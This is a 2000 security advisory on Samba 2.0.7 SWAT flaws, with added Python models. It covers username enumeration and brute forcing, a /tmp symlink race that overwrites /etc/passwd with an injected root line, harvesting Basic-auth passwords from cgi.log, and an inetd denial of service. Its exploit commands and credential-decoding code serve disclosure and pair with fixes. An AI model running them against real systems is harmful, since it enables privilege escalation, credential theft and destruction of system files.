Title: Samba 2.0.7 SWAT vulnerabilities
Released by: Uberhax0r Communications
Date: 30th October 2000
******************************************************************************

The original writeup can be found at http://www.uberhax0r.net/~miah/swat
along with all the code mentioned in this advisory.

******************************************************************************

The program swat included in the Samba distribution allows username and
password brute forcing. An attacker can easily generate a list of valid
usernames and then brute force their passwords. Comments in the source
code show that somebody tried to prevent this from happening [1].

The problem occurs when a user types in the wrong password. The two
failure cases can be told apart both by the response text and by timing.
If swat gets a valid username but an incorrect password, it pauses for
two seconds and then errors with:

    401 Authorization Required

    You must be authenticated to use this service.

If swat gets an invalid username (and therefore an invalid
username/password pair), it errors immediately, with no pause:

    401 Bad Authorization

    username/password must be supplied

Either signal on its own is enough to tell real accounts from
non-existent ones, which turns password guessing into a two-stage attack:
enumerate usernames first, then spend the guesses only on accounts that
exist.

The following code is written by t12. It will generate a list of valid
usernames and then brute force passwords for those usernames. It has been
tested on FreeBSD.

http://www.uberhax0r.net/~miah/swat/code/flyswatter.c

Obviously, if the username/password are correct you get logged in.
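
As an added illustration (not code from the advisory, not flyswatter.c
and not Samba code), the following Python models the two SWAT failure
paths described above, the constant-response behaviour the cgi.c comment
intended, and the two-stage enumerate-then-brute-force attack that
flyswatter.c automates. The account store, the function names, the
candidate names and the wordlists are the example's own constructions;
the delay is returned as a number rather than slept so the model runs
instantly.

```python
# Constructed toy account store standing in for the host's password
# database. Not from the advisory; used only to drive the model.
VALID_USERS = {"root": "s3cret", "miah": "hunter2"}

LOGGED_IN = ("200 OK", "<html>logged in</html>", 0.0)


def swat_vulnerable_auth(user, password):
    """Model of Samba 2.0.7 SWAT as the advisory describes it.

    Returns (status_line, body, delay_seconds). A real probe would time
    the connection; here the delay is reported instead of slept.
    """
    if user in VALID_USERS:
        if VALID_USERS[user] == password:
            return LOGGED_IN
        # Known user, wrong password: distinct text and a 2 second pause.
        return ("401 Authorization Required",
                "You must be authenticated to use this service.", 2.0)
    # Unknown user: different text and no pause at all.
    return ("401 Bad Authorization",
            "username/password must be supplied", 0.0)


def swat_fixed_auth(user, password):
    """What the cgi.c comment intended: every failure looks identical,
    including the delay, so the response carries no information about
    which half of the credential was wrong."""
    if user in VALID_USERS and VALID_USERS[user] == password:
        return LOGGED_IN
    return ("401 Authorization Required",
            "You must be authenticated to use this service.", 2.0)


def failure_fingerprint(auth, user):
    """Probe one username with a throwaway password and reduce the
    response to what an attacker can observe from outside: the text
    returned and whether there was a noticeable pause."""
    status, body, delay = auth(user, "not-the-password")
    return (status, body, delay >= 1.0)


def enumerate_users(auth, candidates):
    """Stage one of the attack: a candidate exists if its failure looks
    different from the failure for a name that cannot possibly exist."""
    baseline = failure_fingerprint(auth, "\x01no-such-user\x01")
    return [u for u in candidates
            if failure_fingerprint(auth, u) != baseline]


def brute_force(auth, user, wordlist):
    """Stage two: spend password guesses only on a confirmed account.
    Returns the password that logged in, or None."""
    for pw in wordlist:
        status, _, _ = auth(user, pw)
        if status.startswith("200"):
            return pw
    return None


if __name__ == "__main__":
    names = ["root", "bob", "miah", "alice"]
    words = ["password", "s3cret", "hunter2"]
    for label, auth in (("vulnerable", swat_vulnerable_auth),
                        ("fixed", swat_fixed_auth)):
        found = enumerate_users(auth, names)
        print(label, "leaks accounts:", found)
        for u in found:
            print("   ", u, "->", brute_force(auth, u, words))
```

Against the vulnerable model the enumerator reports exactly root and
miah; against the fixed model it reports nothing, because every failure
is indistinguishable from the baseline and the attacker is back to
guessing username and password together.
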

What makes this even worse is that swat does no logging by default.
However, if logging [2] is enabled, a /tmp race exists. Swat does not
check whether the log file already exists (or what it is) before opening
it, and it overwrites the file without regret. Worse still, swat will log
*any* input it gets into this log file, so the attacker controls what
gets written. So, for example, if we have a local shell on a system
running swat but want root, we simply plant a symlink at /tmp/cgi.log
that points at /etc/passwd (ln -s TARGET LINK_NAME: the link lives in
/tmp, where we can create it, and its target is the file we cannot
write), then feed swat a passwd line:

ln -s /etc/passwd /tmp/cgi.log

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file:

[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash

You could also use this shell script:
http://www.uberhax0r.net/~miah/swat/code/swat-exp.sh
or, if you want it in C:
http://www.uberhax0r.net/~miah/swat/code/swat-exp.c
also precompiled for Linux:
http://www.uberhax0r.net/~miah/swat/code/swat-exp.linux (code by optyx)

You can also download a fixed cgi.c:
http://www.uberhax0r.net/~miah/swat/code/cgi.c.fixed (make your own damned
diff) (fix by optyx)

You can now su to that user. *NOTE* this will destroy the passwd file,
because the log is opened for writing and truncated rather than appended
to; only the log header and the injected line survive. Now you might be
thinking "but if /tmp/cgi.log already exists, how can a user overwrite it
with a symlink?". The answer: why bother! The cgi.log file contains
everything the user's web browser sent to swat, including their
login/password.
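
The /tmp race above, played out in a scratch directory as an added
example (this is not the advisory's swat-exp script, not cgi.c.fixed and
not Samba code). The two files are stand-ins for /tmp/cgi.log and
/etc/passwd, and the log text reuses the header format quoted above.
safe_log_write is the example's own idea of the check a fixed cgi.c
needs (create-exclusive, never follow a symlink); whether cgi.c.fixed
does it this way is an assumption, not something the page states.

```python
import os
import tempfile

# Constructed stand-in for what swat writes: its date header followed by
# whatever the client sent, here the attacker's passwd line. The header
# format follows the sample entry quoted in the advisory.
INJECTED = ("[Date: Mon, 23 Oct 2000 16:03:13 GMT "
            "localhost.localdomain (127.0.0.1)]\n"
            "rootuser::0:0::/:/bin/bash\n")


def unsafe_log_write(log_path, data):
    """The behaviour the advisory describes: open the log for writing,
    truncating, without checking what is already at that path. A symlink
    planted there is followed, so the data lands in the link's target."""
    with open(log_path, "w") as f:
        f.write(data)


def safe_log_write(log_path, data):
    """Hardened version (assumed fix, not necessarily what cgi.c.fixed
    does). O_CREAT|O_EXCL creates the file atomically and fails if
    anything, file or symlink, is already at the path, which closes the
    check-then-open window; O_NOFOLLOW refuses symlinks as well.
    Returns True if the log was written, False if the path was occupied."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(log_path, flags, 0o600)
    except OSError:  # EEXIST for a planted file or symlink, ELOOP for a symlink
        return False
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return True


def reproduce_race():
    """Run the attack in a temporary directory and report what happened.

    Returns (victim_after_unsafe_write, safe_write_refused,
             victim_unchanged_by_safe_write)."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "passwd")   # stands in for /etc/passwd
        log = os.path.join(d, "cgi.log")     # stands in for /tmp/cgi.log
        with open(victim, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")

        os.symlink(victim, log)        # the attacker's ln -s /etc/passwd /tmp/cgi.log
        unsafe_log_write(log, INJECTED)  # swat "logging" the request
        with open(victim) as f:
            clobbered = f.read()

        refused = not safe_log_write(log, INJECTED)
        with open(victim) as f:
            unchanged = f.read() == clobbered
        return clobbered, refused, unchanged


if __name__ == "__main__":
    contents, refused, unchanged = reproduce_race()
    print("passwd after the vulnerable write:\n" + contents)
    print("hardened open refused the symlink:", refused,
          "- victim untouched:", unchanged)
```

After the vulnerable write the stand-in passwd holds only the log header
and the injected uid 0 line, which is exactly why the advisory warns that
the real passwd file is destroyed; the hardened open never touches the
symlink's target.
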

The Authorization: Basic entries have username:password encoded in
base64 in them (base64 is an encoding, not encryption, so recovering the
pair needs no key). Most of the time the swat administrator will log in
as root to make changes to smb.conf, so getting root is easy. You can run
the gimme-login.sh script to get a list of logins from the cgi.log.
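
An added example of recovering logins from a cgi.log (this is not the
advisory's gimme-login.sh, whose contents the page does not show): it
scans the log for Authorization: Basic headers, base64-decodes each one
and splits on the first colon. The sample log, its request lines and the
credentials it contains are constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample of a CGI_LOGGING=1 cgi.log: the date header swat
# prepends, then the raw request the browser sent. The base64 values are
# made up for the example and decode to root:s3cret and miah:hunter2;
# one entry is deliberately corrupt to show the decoder skipping junk.
SAMPLE_LOG = """\
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
GET / HTTP/1.0
Host: samba.example:901
Authorization: Basic cm9vdDpzM2NyZXQ=
[Date: Mon, 23 Oct 2000 16:05:40 GMT localhost.localdomain (127.0.0.1)]
GET /globals HTTP/1.0
Authorization: Basic bWlhaDpodW50ZXIy
[Date: Mon, 23 Oct 2000 16:06:01 GMT localhost.localdomain (127.0.0.1)]
GET / HTTP/1.0
Authorization: Basic %%%not-base64%%%
[Date: Mon, 23 Oct 2000 16:09:12 GMT localhost.localdomain (127.0.0.1)]
GET /status HTTP/1.0
Authorization: Basic cm9vdDpzM2NyZXQ=
"""

# Header name and scheme token are case-insensitive in HTTP.
AUTH_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)\s*$",
                     re.IGNORECASE | re.MULTILINE)


def decode_basic(token):
    """Turn one Basic credential token into (user, password).

    Returns None for garbage: a log can hold truncated or non-base64
    junk, and a decoded value without a colon is not a credential.
    The user-id may not contain ':', so the first colon is the split."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if ":" not in text:
        return None
    user, _, password = text.partition(":")
    return user, password


def harvest_logins(log_text):
    """Every distinct (user, password) pair found in the log, in order
    of first appearance."""
    seen = []
    for m in AUTH_RE.finditer(log_text):
        cred = decode_basic(m.group(1))
        if cred is not None and cred not in seen:
            seen.append(cred)
    return seen


def root_password(log_text):
    """The advisory's point: the admin usually logs in as root, so the
    log hands over the root password directly."""
    for user, password in harvest_logins(log_text):
        if user == "root":
            return password
    return None


if __name__ == "__main__":
    for user, password in harvest_logins(SAMPLE_LOG):
        print(f"{user}:{password}")
    print("root password:", root_password(SAMPLE_LOG))
```

Run against the sample it yields root:s3cret and miah:hunter2 once each,
ignores the corrupt entry, and reports s3cret as the root password.
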

Swat is also vulnerable to a DoS attack, and anybody can perform it.
Simply log in to swat with an improper username and password, but change
the default URL from "hostname:901" to something like
"hostname:901?somerandomfile". Swat will error with "Authentication
Required" (even with valid accounts) and inetd will restart it. Netscape
will keep retrying the request, and each retry is a fresh inetd
connection, so the retries eventually trip inetd's connection-rate limit
and inetd shuts swat down for 10 minutes (the threshold and the lockout
period depend on the inetd configuration; this was tested on Red Hat
Linux 6.2).

[1] In the cgi.c file the following entry exists (line 349/367):

/*
 * Always give the same error so a cracker
 * cannot tell why we fail.
 */

The person that wrote this code obviously didn't check their work too
well: the comment states the right defence, but the two failure paths
still differ in both message and timing.

[2] Logging is enabled by changing samba-2.0.7/source/web/cgi.c's
"#define CGI_LOGGING 0" to "#define CGI_LOGGING 1" and rebuilding. Some
systems may have this on by default; otherwise it's a tweak the sysadmin
will most likely have to do.

Credit to miah for discovering everything and to t12 and optyx for the
code.

*****************************************************************************

Uberhax0r Communications, putting bullets in mullets since '96







